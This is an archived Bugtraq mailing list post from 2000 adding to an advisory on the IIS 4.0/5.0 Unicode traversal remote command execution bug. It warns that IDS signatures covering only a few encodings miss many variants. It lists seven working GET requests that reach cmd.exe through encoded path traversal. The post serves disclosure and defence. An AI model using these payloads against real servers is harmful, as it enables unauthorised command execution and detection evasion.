Bugtraq: [LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

[LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution

From: ET LoWNOISE <et () CYBERSPACE ORG>
Date: Fri, 20 Oct 2000 03:30:48 -0400

Hola,

Just a quick note to add.
Too many people are now just creating new signatures on their IDS to
"protect" their servers based on the recents advisories where appears only
exploit information with:

%c1%1c
%c0%af
%c1%9c

Is just a misunderstanding there are too many ways to exploit this
bug..doing a quick search :

 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir (C-1-PC)

this is just in the range c0 00 to c2 00...!

Efrain 'ET' Torres
[LoWNOISE] Colombia
et () cyberspace org

By Date By Thread

Current thread:

IIS %c1%1c remote command execution rain forest puppy (Oct 17)
- Re: IIS %c1%1c remote command execution Florian Weimer (Oct 18)
  - Re: IIS %c1%1c remote command execution rain forest puppy (Oct 19)
    - [LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution ET LoWNOISE (Oct 20)
- <Possible follow-ups>
- Re: IIS %c1%1c remote command execution Nsfocus Security Team (Oct 18)
- Re: IIS %c1%1c remote command execution Cris Bailiff (Oct 19)